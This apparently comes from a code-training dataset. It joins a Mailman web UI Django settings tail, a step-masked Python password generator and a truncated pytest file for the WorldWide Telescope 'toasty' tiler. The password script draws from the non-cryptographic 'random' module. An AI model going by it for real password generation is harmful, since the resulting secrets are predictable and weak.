'mm', 'identicon', 'monsterid', 'wavatar', 'retro'.\nGRAVATAR_DEFAULT_IMAGE = 'retro'\n# One of the following: 'g', 'pg', 'r', 'x'.\n#GRAVATAR_DEFAULT_RATING = 'g'\n# True to use https by default, False for plain http.\nGRAVATAR_DEFAULT_SECURE = True\n\n\n#\n# 
Logging\n#\n\n# A sample logging configuration. The only tangible logging performed by this\n# configuration is to send an email to the site admins on every HTTP 500 error\n# when DEBUG=False. See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple',\n },\n 'file':{\n 'level': 'INFO',\n #'class': 'logging.handlers.RotatingFileHandler',\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': joinpath(LOG_DIR, 'mailman-webui.log'),\n 'formatter': 'verbose',\n },\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n },\n 'loggers': {\n #'django.request': {\n # 'handlers': ['mail_admins'],\n # 'level': 'ERROR',\n # 'propagate': True,\n #},\n 'django.request': {\n 'handlers': ['file'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'django': {\n 'handlers': ['file'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'postorius': {\n 'handlers': ['file'],\n 'level': 'INFO',\n 'propagate': True,\n },\n 'hyperkitty': {\n 'handlers': ['file'],\n 'level': 'INFO',\n 'propagate': True,\n },\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'root': {\n 'handlers': ['file'],\n 'level': 'INFO',\n },\n}\n\nif 'raven.contrib.django.raven_compat' in INSTALLED_APPS:\n RAVEN_CONFIG = {\n 'dsn': 'https://<key>:<secret>@sentry.io/<project>',\n }\n LOGGING['handlers']['sentry'] = {\n 'level': 'ERROR',\n 'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',\n }\n LOGGING['loggers']['root']['handlers'].append('sentry')\n\n\ntry:\n from settings_local import *\nexcept ImportError:\n pass\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import random
s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-/.,;'[]{}:<>?"
i = 0
fin = ""
while i == 0:
num = int(input("What length do you want? "))
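    # random.sample picks characters without repetition, so the requested
    # length must not exceed len(s) or a ValueError is raised.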
password = "".join(random.sample(s, num))
print(password)
j = 0
    while j == 0:
        # Keep asking until the user answers yes or no.
        want = input("Do you want this password? (yes or no) ").lower()
if want == "yes":
print("Your Password is " + password)
break
elif want == "no":
break
if want == "yes":
fin = input("Do you want a new password. yes or no? ")
fin.lower()
while j == 0:
if fin == "yes":
break
elif fin == "no":
break
if fin == "no":
print("This is your final password " + password)
break
|
normal
|
{
"blob_id": "3089dba0956151bd43e443b679ec0b24da644d08",
"index": 3701,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile i == 0:\n num = int(input('What length do you want? '))\n password = ''.join(random.sample(s, num))\n print(password)\n j = 0\n while j == 0:\n want = input('Do you this password? (yes or no) ')\n want.lower()\n if want == 'yes':\n print('Your Password is ' + password)\n break\n elif want == 'no':\n break\n if want == 'yes':\n fin = input('Do you want a new password. yes or no? ')\n fin.lower()\n while j == 0:\n if fin == 'yes':\n break\n elif fin == 'no':\n break\n if fin == 'no':\n print('This is your final password ' + password)\n break\n",
"step-3": "<mask token>\ns = (\n \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-/.,;'[]{}:<>?\"\n )\ni = 0\nfin = ''\nwhile i == 0:\n num = int(input('What length do you want? '))\n password = ''.join(random.sample(s, num))\n print(password)\n j = 0\n while j == 0:\n want = input('Do you this password? (yes or no) ')\n want.lower()\n if want == 'yes':\n print('Your Password is ' + password)\n break\n elif want == 'no':\n break\n if want == 'yes':\n fin = input('Do you want a new password. yes or no? ')\n fin.lower()\n while j == 0:\n if fin == 'yes':\n break\n elif fin == 'no':\n break\n if fin == 'no':\n print('This is your final password ' + password)\n break\n",
"step-4": "import random\ns = (\n \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-/.,;'[]{}:<>?\"\n )\ni = 0\nfin = ''\nwhile i == 0:\n num = int(input('What length do you want? '))\n password = ''.join(random.sample(s, num))\n print(password)\n j = 0\n while j == 0:\n want = input('Do you this password? (yes or no) ')\n want.lower()\n if want == 'yes':\n print('Your Password is ' + password)\n break\n elif want == 'no':\n break\n if want == 'yes':\n fin = input('Do you want a new password. yes or no? ')\n fin.lower()\n while j == 0:\n if fin == 'yes':\n break\n elif fin == 'no':\n break\n if fin == 'no':\n print('This is your final password ' + password)\n break\n",
"step-5": "import random\n\ns = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-/.,;'[]{}:<>?\"\ni = 0\nfin = \"\"\nwhile i == 0:\n num = int(input(\"What length do you want? \"))\n\n password = \"\".join(random.sample(s, num))\n\n print(password)\n j = 0\n while(j ==0):\n want = input(\"Do you this password? (yes or no) \")\n want.lower()\n if want == \"yes\":\n print(\"Your Password is \" + password)\n break\n elif want == \"no\":\n break\n if want == \"yes\":\n fin = input(\"Do you want a new password. yes or no? \")\n fin.lower()\n while j == 0:\n if fin == \"yes\":\n break\n elif fin == \"no\":\n break\n if fin == \"no\":\n print(\"This is your final password \" + password)\n break",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- mode: python; coding: utf-8 -*-
# Copyright 2019-2021 the AAS WorldWide Telescope project
# Licensed under the MIT License.
from __future__ import absolute_import, division, print_function
import numpy as np
import numpy.testing as nt
import os.path
import pytest
import sys
from xml.etree import ElementTree as etree
from . import assert_xml_elements_equal, test_path
from ..builder import Builder
from .. import cli
from .. import collection
from .. import multi_tan
try:
from astropy.io import fits
HAS_ASTRO = True
except ImportError:
HAS_ASTRO = False
try:
import reproject
HAS_REPROJECT = True
except ImportError:
HAS_REPROJECT = False
class TestMultiTan(object):
WTML = """
<Folder Browseable="True" Group="Explorer" Name="Toasty" Searchable="True">
<Place
Angle="0"
AngularSize="0"
Constellation="VIR"
DataSetType="Sky"
Dec="0.7438249862258411"
Magnitude="0"
Name="Toasty"
Opacity="100"
RA="14.41975153073335"
Rotation="0"
Thumbnail="thumb.jpg"
ZoomLevel="0.2437119999998555"
>
<ForegroundImageSet>
<ImageSet
BandPass="Visible"
BaseDegreesPerTile="0.023893333333319167"
BaseTileLevel="0"
BottomsUp="False"
CenterX="216.2962962963"
CenterY="0.74380165289257"
DataSetType="Sky"
ElevationModel="False"
FileType=".fits"
Generic="False"
Name="Toasty"
OffsetX="2.33333333333195e-05"
OffsetY="2.33333333333195e-05"
Projection="Tan"
QuadTreeMap=""
Rotation="-0"
Sparse="True"
StockSet="False"
TileLevels="1"
Url="{1}/{3}/{3}_{2}.fits"
WidthFactor="2"
>
<ThumbnailUrl>thumb.jpg</ThumbnailUrl>
</ImageSet>
</ForegroundImageSet>
</Place>
</Folder>"""
# Gross workaround for platform differences in the XML output.
if sys.platform == "darwin":
WTML = WTML.replace('Dec="0.7438249862258411"', 'Dec="0.743824986225841"')
# Back to the non-gross stuff.
def setup_method(self, method):
from tempfile import mkdtemp
self.work_dir = mkdtemp()
def teardown_method(self, method):
from shutil import rmtree
rmtree(self.work_dir)
def work_path(self, *pieces):
return os.path.join(self.work_dir, *pieces)
def test_basic(self):
coll = collection.SimpleFitsCollection([test_path("wcs512.fits.gz")])
proc = multi_tan.MultiTanProcessor(coll)
from ..pyramid import PyramidIO
pio = PyramidIO(self.work_path("basic"), default_format="fits")
builder = Builder(pio)
proc.compute_global_pixelization(builder)
proc.tile(pio)
BARY_SLICES = [
(slice(0, 128), slice(0, 128)),
(slice(0, 128), slice(128, None)),
(slice(128, None), slice(0, 128)),
(slice(128, None), slice(128, None)),
]
def maybe_test_barycenter(self, path, bary_expected):
"""
Check the barycenters of four 128x128 quadrants of a tile file. The idea
here is that if we introduce a problem with vertical flips in tiled FITS
processing, we'll detect it here.
"""
if not HAS_ASTRO:
return
with fits.open(path) as hdul:
data = hdul[0].data
data[~np.isfinite(data)] = 0.0
bary_observed = []
for islice in self.BARY_SLICES:
idata = data[islice]
yidx, xidx = np.indices((128, 128))
xbary = (idata * xidx).sum() / idata.sum()
ybary = (idata * yidx).sum() / idata.sum()
bary_observed.append((xbary, ybary))
nt.assert_array_almost_equal(bary_observed, bary_expected, decimal=5)
WCS512_BARYDATA = [
(63.44949378800272, 64.40535387506924),
(63.24744175084746, 63.67473452789256),
(65.22950207855361, 63.35629429568745),
(62.027396724898814, 62.815937534782144),
]
def test_basic_cli(self):
"""
Test the CLI interface. We don't go out of our way to validate the
computations in detail -- that's for the unit tests that probe the
module directly.
"""
expected = etree.fromstring(
self.WTML.replace('Thumbnail="thumb.jpg"', "").replace(
"<ThumbnailUrl>thumb.jpg</ThumbnailUrl>",
"<ThumbnailUrl></ThumbnailUrl>",
)
)
args = [
"tile-multi-tan",
"--hdu-index",
"0",
"--outdir",
self.work_path("basic_cli"),
test_path("wcs512.fits.gz"),
]
cli.entrypoint(args)
with open(
self.work_path("basic_cli", "index_rel.wtml"), "rt", encoding="utf8"
) as f:
observed = etree.fromstring(f.read())
assert_xml_elements_equal(observed, expected)
args = [
"cascade",
"--start",
"1",
self.work_path("basic_cli"),
]
cli.entrypoint(args)
self.maybe_test_barycenter(
self.work_path("basic_cli", "0", "0", "0_0.fits"), self.WCS512_BARYDATA
)
def test_study_cli(self):
"""
Test tile-study on FITS. This should properly go in test_study.py, but
this file is the one that has the reference WTML information.
"""
expected = etree.fromstring(self.WTML)
args = [
"tile-study",
"--placeholder-thumbnail",
"--outdir",
self.work_path("study_cli"),
test_path("wcs512.fits.gz"),
]
cli.entrypoint(args)
with open(
self.work_path("study_cli", "index_rel.wtml"), "rt", encoding="utf8"
) as f:
observed = etree.fromstring(f.read())
assert_xml_elements_equal(observed, expected)
args = [
"cascade",
"--start",
"1",
self.work_path("study_cli"),
]
cli.entrypoint(args)
self.maybe_test_barycenter(
self.work_path("study_cli", "0", "0", "0_0.fits"), self.WCS512_BARYDATA
)
@pytest.mark.skipif("not HAS_REPROJECT")
def test_as_multi_wcs(self):
"""
Once again, this doesn't super belong here, but this is where we have
the reference data. We don't compare the WTML contents here since the
reprojection isn't going to preserve the WCS in detail.
"""
from .. import builder, collection, multi_wcs, pyramid
reproject_function = reproject.reproject_interp
outdir = self.work_path("as_multi_wcs")
pio = pyramid.PyramidIO(outdir, default_format="fits")
bld = builder.Builder(pio)
coll = collection.SimpleFitsCollection(
[test_path("wcs512.fits.gz")], hdu_index=0
)
proc = multi_wcs.MultiWcsProcessor(coll)
proc.compute_global_pixelization(bld)
proc.tile(pio, reproject_function, cli_progress=False, parallel=1)
bld.write_index_rel_wtml()
args = [
"cascade",
"--start",
"1",
self.work_path("as_multi_wcs"),
]
cli.entrypoint(args)
self.maybe_test_barycenter(
self.work_path("as_multi_wcs", "0", "0", "0_0.fits"), self.WCS512_BARYDATA
)
|
normal
|
{
"blob_id": "618b6c74133e181ce5cbaf4e969d9fc3aa44ce98",
"index": 1261,
"step-1": "<mask token>\n\n\nclass TestMultiTan(object):\n <mask token>\n if sys.platform == 'darwin':\n WTML = WTML.replace('Dec=\"0.7438249862258411\"',\n 'Dec=\"0.743824986225841\"')\n <mask token>\n\n def teardown_method(self, method):\n from shutil import rmtree\n rmtree(self.work_dir)\n <mask token>\n <mask token>\n <mask token>\n\n def maybe_test_barycenter(self, path, bary_expected):\n \"\"\"\n Check the barycenters of four 128x128 quadrants of a tile file. The idea\n here is that if we introduce a problem with vertical flips in tiled FITS\n processing, we'll detect it here.\n \"\"\"\n if not HAS_ASTRO:\n return\n with fits.open(path) as hdul:\n data = hdul[0].data\n data[~np.isfinite(data)] = 0.0\n bary_observed = []\n for islice in self.BARY_SLICES:\n idata = data[islice]\n yidx, xidx = np.indices((128, 128))\n xbary = (idata * xidx).sum() / idata.sum()\n ybary = (idata * yidx).sum() / idata.sum()\n bary_observed.append((xbary, ybary))\n nt.assert_array_almost_equal(bary_observed, bary_expected, decimal=5)\n <mask token>\n\n def test_basic_cli(self):\n \"\"\"\n Test the CLI interface. We don't go out of our way to validate the\n computations in detail -- that's for the unit tests that probe the\n module directly.\n \"\"\"\n expected = etree.fromstring(self.WTML.replace(\n 'Thumbnail=\"thumb.jpg\"', '').replace(\n '<ThumbnailUrl>thumb.jpg</ThumbnailUrl>',\n '<ThumbnailUrl></ThumbnailUrl>'))\n args = ['tile-multi-tan', '--hdu-index', '0', '--outdir', self.\n work_path('basic_cli'), test_path('wcs512.fits.gz')]\n cli.entrypoint(args)\n with open(self.work_path('basic_cli', 'index_rel.wtml'), 'rt',\n encoding='utf8') as f:\n observed = etree.fromstring(f.read())\n assert_xml_elements_equal(observed, expected)\n args = ['cascade', '--start', '1', self.work_path('basic_cli')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('basic_cli', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n <mask token>\n\n @pytest.mark.skipif('not HAS_REPROJECT')\n def test_as_multi_wcs(self):\n \"\"\"\n Once again, this doesn't super belong here, but this is where we have\n the reference data. We don't compare the WTML contents here since the\n reprojection isn't going to preserve the WCS in detail.\n \"\"\"\n from .. import builder, collection, multi_wcs, pyramid\n reproject_function = reproject.reproject_interp\n outdir = self.work_path('as_multi_wcs')\n pio = pyramid.PyramidIO(outdir, default_format='fits')\n bld = builder.Builder(pio)\n coll = collection.SimpleFitsCollection([test_path('wcs512.fits.gz')\n ], hdu_index=0)\n proc = multi_wcs.MultiWcsProcessor(coll)\n proc.compute_global_pixelization(bld)\n proc.tile(pio, reproject_function, cli_progress=False, parallel=1)\n bld.write_index_rel_wtml()\n args = ['cascade', '--start', '1', self.work_path('as_multi_wcs')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('as_multi_wcs', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n",
"step-2": "<mask token>\n\n\nclass TestMultiTan(object):\n <mask token>\n if sys.platform == 'darwin':\n WTML = WTML.replace('Dec=\"0.7438249862258411\"',\n 'Dec=\"0.743824986225841\"')\n <mask token>\n\n def teardown_method(self, method):\n from shutil import rmtree\n rmtree(self.work_dir)\n <mask token>\n\n def test_basic(self):\n coll = collection.SimpleFitsCollection([test_path('wcs512.fits.gz')])\n proc = multi_tan.MultiTanProcessor(coll)\n from ..pyramid import PyramidIO\n pio = PyramidIO(self.work_path('basic'), default_format='fits')\n builder = Builder(pio)\n proc.compute_global_pixelization(builder)\n proc.tile(pio)\n <mask token>\n\n def maybe_test_barycenter(self, path, bary_expected):\n \"\"\"\n Check the barycenters of four 128x128 quadrants of a tile file. The idea\n here is that if we introduce a problem with vertical flips in tiled FITS\n processing, we'll detect it here.\n \"\"\"\n if not HAS_ASTRO:\n return\n with fits.open(path) as hdul:\n data = hdul[0].data\n data[~np.isfinite(data)] = 0.0\n bary_observed = []\n for islice in self.BARY_SLICES:\n idata = data[islice]\n yidx, xidx = np.indices((128, 128))\n xbary = (idata * xidx).sum() / idata.sum()\n ybary = (idata * yidx).sum() / idata.sum()\n bary_observed.append((xbary, ybary))\n nt.assert_array_almost_equal(bary_observed, bary_expected, decimal=5)\n <mask token>\n\n def test_basic_cli(self):\n \"\"\"\n Test the CLI interface. We don't go out of our way to validate the\n computations in detail -- that's for the unit tests that probe the\n module directly.\n \"\"\"\n expected = etree.fromstring(self.WTML.replace(\n 'Thumbnail=\"thumb.jpg\"', '').replace(\n '<ThumbnailUrl>thumb.jpg</ThumbnailUrl>',\n '<ThumbnailUrl></ThumbnailUrl>'))\n args = ['tile-multi-tan', '--hdu-index', '0', '--outdir', self.\n work_path('basic_cli'), test_path('wcs512.fits.gz')]\n cli.entrypoint(args)\n with open(self.work_path('basic_cli', 'index_rel.wtml'), 'rt',\n encoding='utf8') as f:\n observed = etree.fromstring(f.read())\n assert_xml_elements_equal(observed, expected)\n args = ['cascade', '--start', '1', self.work_path('basic_cli')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('basic_cli', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n <mask token>\n\n @pytest.mark.skipif('not HAS_REPROJECT')\n def test_as_multi_wcs(self):\n \"\"\"\n Once again, this doesn't super belong here, but this is where we have\n the reference data. We don't compare the WTML contents here since the\n reprojection isn't going to preserve the WCS in detail.\n \"\"\"\n from .. import builder, collection, multi_wcs, pyramid\n reproject_function = reproject.reproject_interp\n outdir = self.work_path('as_multi_wcs')\n pio = pyramid.PyramidIO(outdir, default_format='fits')\n bld = builder.Builder(pio)\n coll = collection.SimpleFitsCollection([test_path('wcs512.fits.gz')\n ], hdu_index=0)\n proc = multi_wcs.MultiWcsProcessor(coll)\n proc.compute_global_pixelization(bld)\n proc.tile(pio, reproject_function, cli_progress=False, parallel=1)\n bld.write_index_rel_wtml()\n args = ['cascade', '--start', '1', self.work_path('as_multi_wcs')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('as_multi_wcs', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n",
"step-3": "<mask token>\n\n\nclass TestMultiTan(object):\n <mask token>\n if sys.platform == 'darwin':\n WTML = WTML.replace('Dec=\"0.7438249862258411\"',\n 'Dec=\"0.743824986225841\"')\n\n def setup_method(self, method):\n from tempfile import mkdtemp\n self.work_dir = mkdtemp()\n\n def teardown_method(self, method):\n from shutil import rmtree\n rmtree(self.work_dir)\n\n def work_path(self, *pieces):\n return os.path.join(self.work_dir, *pieces)\n\n def test_basic(self):\n coll = collection.SimpleFitsCollection([test_path('wcs512.fits.gz')])\n proc = multi_tan.MultiTanProcessor(coll)\n from ..pyramid import PyramidIO\n pio = PyramidIO(self.work_path('basic'), default_format='fits')\n builder = Builder(pio)\n proc.compute_global_pixelization(builder)\n proc.tile(pio)\n <mask token>\n\n def maybe_test_barycenter(self, path, bary_expected):\n \"\"\"\n Check the barycenters of four 128x128 quadrants of a tile file. The idea\n here is that if we introduce a problem with vertical flips in tiled FITS\n processing, we'll detect it here.\n \"\"\"\n if not HAS_ASTRO:\n return\n with fits.open(path) as hdul:\n data = hdul[0].data\n data[~np.isfinite(data)] = 0.0\n bary_observed = []\n for islice in self.BARY_SLICES:\n idata = data[islice]\n yidx, xidx = np.indices((128, 128))\n xbary = (idata * xidx).sum() / idata.sum()\n ybary = (idata * yidx).sum() / idata.sum()\n bary_observed.append((xbary, ybary))\n nt.assert_array_almost_equal(bary_observed, bary_expected, decimal=5)\n <mask token>\n\n def test_basic_cli(self):\n \"\"\"\n Test the CLI interface. We don't go out of our way to validate the\n computations in detail -- that's for the unit tests that probe the\n module directly.\n \"\"\"\n expected = etree.fromstring(self.WTML.replace(\n 'Thumbnail=\"thumb.jpg\"', '').replace(\n '<ThumbnailUrl>thumb.jpg</ThumbnailUrl>',\n '<ThumbnailUrl></ThumbnailUrl>'))\n args = ['tile-multi-tan', '--hdu-index', '0', '--outdir', self.\n work_path('basic_cli'), test_path('wcs512.fits.gz')]\n cli.entrypoint(args)\n with open(self.work_path('basic_cli', 'index_rel.wtml'), 'rt',\n encoding='utf8') as f:\n observed = etree.fromstring(f.read())\n assert_xml_elements_equal(observed, expected)\n args = ['cascade', '--start', '1', self.work_path('basic_cli')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('basic_cli', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n\n def test_study_cli(self):\n \"\"\"\n Test tile-study on FITS. This should properly go in test_study.py, but\n this file is the one that has the reference WTML information.\n \"\"\"\n expected = etree.fromstring(self.WTML)\n args = ['tile-study', '--placeholder-thumbnail', '--outdir', self.\n work_path('study_cli'), test_path('wcs512.fits.gz')]\n cli.entrypoint(args)\n with open(self.work_path('study_cli', 'index_rel.wtml'), 'rt',\n encoding='utf8') as f:\n observed = etree.fromstring(f.read())\n assert_xml_elements_equal(observed, expected)\n args = ['cascade', '--start', '1', self.work_path('study_cli')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('study_cli', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n\n @pytest.mark.skipif('not HAS_REPROJECT')\n def test_as_multi_wcs(self):\n \"\"\"\n Once again, this doesn't super belong here, but this is where we have\n the reference data. We don't compare the WTML contents here since the\n reprojection isn't going to preserve the WCS in detail.\n \"\"\"\n from .. 
import builder, collection, multi_wcs, pyramid\n reproject_function = reproject.reproject_interp\n outdir = self.work_path('as_multi_wcs')\n pio = pyramid.PyramidIO(outdir, default_format='fits')\n bld = builder.Builder(pio)\n coll = collection.SimpleFitsCollection([test_path('wcs512.fits.gz')\n ], hdu_index=0)\n proc = multi_wcs.MultiWcsProcessor(coll)\n proc.compute_global_pixelization(bld)\n proc.tile(pio, reproject_function, cli_progress=False, parallel=1)\n bld.write_index_rel_wtml()\n args = ['cascade', '--start', '1', self.work_path('as_multi_wcs')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('as_multi_wcs', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n",
"step-4": "<mask token>\n\n\nclass TestMultiTan(object):\n WTML = \"\"\"\n<Folder Browseable=\"True\" Group=\"Explorer\" Name=\"Toasty\" Searchable=\"True\">\n <Place\n Angle=\"0\"\n AngularSize=\"0\"\n Constellation=\"VIR\"\n DataSetType=\"Sky\"\n Dec=\"0.7438249862258411\"\n Magnitude=\"0\"\n Name=\"Toasty\"\n Opacity=\"100\"\n RA=\"14.41975153073335\"\n Rotation=\"0\"\n Thumbnail=\"thumb.jpg\"\n ZoomLevel=\"0.2437119999998555\"\n >\n <ForegroundImageSet>\n <ImageSet\n BandPass=\"Visible\"\n BaseDegreesPerTile=\"0.023893333333319167\"\n BaseTileLevel=\"0\"\n BottomsUp=\"False\"\n CenterX=\"216.2962962963\"\n CenterY=\"0.74380165289257\"\n DataSetType=\"Sky\"\n ElevationModel=\"False\"\n FileType=\".fits\"\n Generic=\"False\"\n Name=\"Toasty\"\n OffsetX=\"2.33333333333195e-05\"\n OffsetY=\"2.33333333333195e-05\"\n Projection=\"Tan\"\n QuadTreeMap=\"\"\n Rotation=\"-0\"\n Sparse=\"True\"\n StockSet=\"False\"\n TileLevels=\"1\"\n Url=\"{1}/{3}/{3}_{2}.fits\"\n WidthFactor=\"2\"\n >\n <ThumbnailUrl>thumb.jpg</ThumbnailUrl>\n </ImageSet>\n </ForegroundImageSet>\n </Place>\n</Folder>\"\"\"\n if sys.platform == 'darwin':\n WTML = WTML.replace('Dec=\"0.7438249862258411\"',\n 'Dec=\"0.743824986225841\"')\n\n def setup_method(self, method):\n from tempfile import mkdtemp\n self.work_dir = mkdtemp()\n\n def teardown_method(self, method):\n from shutil import rmtree\n rmtree(self.work_dir)\n\n def work_path(self, *pieces):\n return os.path.join(self.work_dir, *pieces)\n\n def test_basic(self):\n coll = collection.SimpleFitsCollection([test_path('wcs512.fits.gz')])\n proc = multi_tan.MultiTanProcessor(coll)\n from ..pyramid import PyramidIO\n pio = PyramidIO(self.work_path('basic'), default_format='fits')\n builder = Builder(pio)\n proc.compute_global_pixelization(builder)\n proc.tile(pio)\n BARY_SLICES = [(slice(0, 128), slice(0, 128)), (slice(0, 128), slice(\n 128, None)), (slice(128, None), slice(0, 128)), (slice(128, None),\n slice(128, None))]\n\n def maybe_test_barycenter(self, path, bary_expected):\n \"\"\"\n Check the barycenters of four 128x128 quadrants of a tile file. The idea\n here is that if we introduce a problem with vertical flips in tiled FITS\n processing, we'll detect it here.\n \"\"\"\n if not HAS_ASTRO:\n return\n with fits.open(path) as hdul:\n data = hdul[0].data\n data[~np.isfinite(data)] = 0.0\n bary_observed = []\n for islice in self.BARY_SLICES:\n idata = data[islice]\n yidx, xidx = np.indices((128, 128))\n xbary = (idata * xidx).sum() / idata.sum()\n ybary = (idata * yidx).sum() / idata.sum()\n bary_observed.append((xbary, ybary))\n nt.assert_array_almost_equal(bary_observed, bary_expected, decimal=5)\n WCS512_BARYDATA = [(63.44949378800272, 64.40535387506924), (\n 63.24744175084746, 63.67473452789256), (65.22950207855361, \n 63.35629429568745), (62.027396724898814, 62.815937534782144)]\n\n def test_basic_cli(self):\n \"\"\"\n Test the CLI interface. 
We don't go out of our way to validate the\n computations in detail -- that's for the unit tests that probe the\n module directly.\n \"\"\"\n expected = etree.fromstring(self.WTML.replace(\n 'Thumbnail=\"thumb.jpg\"', '').replace(\n '<ThumbnailUrl>thumb.jpg</ThumbnailUrl>',\n '<ThumbnailUrl></ThumbnailUrl>'))\n args = ['tile-multi-tan', '--hdu-index', '0', '--outdir', self.\n work_path('basic_cli'), test_path('wcs512.fits.gz')]\n cli.entrypoint(args)\n with open(self.work_path('basic_cli', 'index_rel.wtml'), 'rt',\n encoding='utf8') as f:\n observed = etree.fromstring(f.read())\n assert_xml_elements_equal(observed, expected)\n args = ['cascade', '--start', '1', self.work_path('basic_cli')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('basic_cli', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n\n def test_study_cli(self):\n \"\"\"\n Test tile-study on FITS. This should properly go in test_study.py, but\n this file is the one that has the reference WTML information.\n \"\"\"\n expected = etree.fromstring(self.WTML)\n args = ['tile-study', '--placeholder-thumbnail', '--outdir', self.\n work_path('study_cli'), test_path('wcs512.fits.gz')]\n cli.entrypoint(args)\n with open(self.work_path('study_cli', 'index_rel.wtml'), 'rt',\n encoding='utf8') as f:\n observed = etree.fromstring(f.read())\n assert_xml_elements_equal(observed, expected)\n args = ['cascade', '--start', '1', self.work_path('study_cli')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('study_cli', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n\n @pytest.mark.skipif('not HAS_REPROJECT')\n def test_as_multi_wcs(self):\n \"\"\"\n Once again, this doesn't super belong here, but this is where we have\n the reference data. We don't compare the WTML contents here since the\n reprojection isn't going to preserve the WCS in detail.\n \"\"\"\n from .. import builder, collection, multi_wcs, pyramid\n reproject_function = reproject.reproject_interp\n outdir = self.work_path('as_multi_wcs')\n pio = pyramid.PyramidIO(outdir, default_format='fits')\n bld = builder.Builder(pio)\n coll = collection.SimpleFitsCollection([test_path('wcs512.fits.gz')\n ], hdu_index=0)\n proc = multi_wcs.MultiWcsProcessor(coll)\n proc.compute_global_pixelization(bld)\n proc.tile(pio, reproject_function, cli_progress=False, parallel=1)\n bld.write_index_rel_wtml()\n args = ['cascade', '--start', '1', self.work_path('as_multi_wcs')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('as_multi_wcs', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n",
"step-5": "# -*- mode: python; coding: utf-8 -*-\n# Copyright 2019-2021 the AAS WorldWide Telescope project\n# Licensed under the MIT License.\n\nfrom __future__ import absolute_import, division, print_function\n\nimport numpy as np\nimport numpy.testing as nt\nimport os.path\nimport pytest\nimport sys\nfrom xml.etree import ElementTree as etree\n\nfrom . import assert_xml_elements_equal, test_path\nfrom ..builder import Builder\nfrom .. import cli\nfrom .. import collection\nfrom .. import multi_tan\n\n\ntry:\n from astropy.io import fits\n\n HAS_ASTRO = True\nexcept ImportError:\n HAS_ASTRO = False\n\n\ntry:\n import reproject\n\n HAS_REPROJECT = True\nexcept ImportError:\n HAS_REPROJECT = False\n\n\nclass TestMultiTan(object):\n WTML = \"\"\"\n<Folder Browseable=\"True\" Group=\"Explorer\" Name=\"Toasty\" Searchable=\"True\">\n <Place\n Angle=\"0\"\n AngularSize=\"0\"\n Constellation=\"VIR\"\n DataSetType=\"Sky\"\n Dec=\"0.7438249862258411\"\n Magnitude=\"0\"\n Name=\"Toasty\"\n Opacity=\"100\"\n RA=\"14.41975153073335\"\n Rotation=\"0\"\n Thumbnail=\"thumb.jpg\"\n ZoomLevel=\"0.2437119999998555\"\n >\n <ForegroundImageSet>\n <ImageSet\n BandPass=\"Visible\"\n BaseDegreesPerTile=\"0.023893333333319167\"\n BaseTileLevel=\"0\"\n BottomsUp=\"False\"\n CenterX=\"216.2962962963\"\n CenterY=\"0.74380165289257\"\n DataSetType=\"Sky\"\n ElevationModel=\"False\"\n FileType=\".fits\"\n Generic=\"False\"\n Name=\"Toasty\"\n OffsetX=\"2.33333333333195e-05\"\n OffsetY=\"2.33333333333195e-05\"\n Projection=\"Tan\"\n QuadTreeMap=\"\"\n Rotation=\"-0\"\n Sparse=\"True\"\n StockSet=\"False\"\n TileLevels=\"1\"\n Url=\"{1}/{3}/{3}_{2}.fits\"\n WidthFactor=\"2\"\n >\n <ThumbnailUrl>thumb.jpg</ThumbnailUrl>\n </ImageSet>\n </ForegroundImageSet>\n </Place>\n</Folder>\"\"\"\n\n # Gross workaround for platform differences in the XML output.\n\n if sys.platform == \"darwin\":\n WTML = WTML.replace('Dec=\"0.7438249862258411\"', 'Dec=\"0.743824986225841\"')\n\n # Back to the non-gross stuff.\n\n def setup_method(self, method):\n from tempfile import mkdtemp\n\n self.work_dir = mkdtemp()\n\n def teardown_method(self, method):\n from shutil import rmtree\n\n 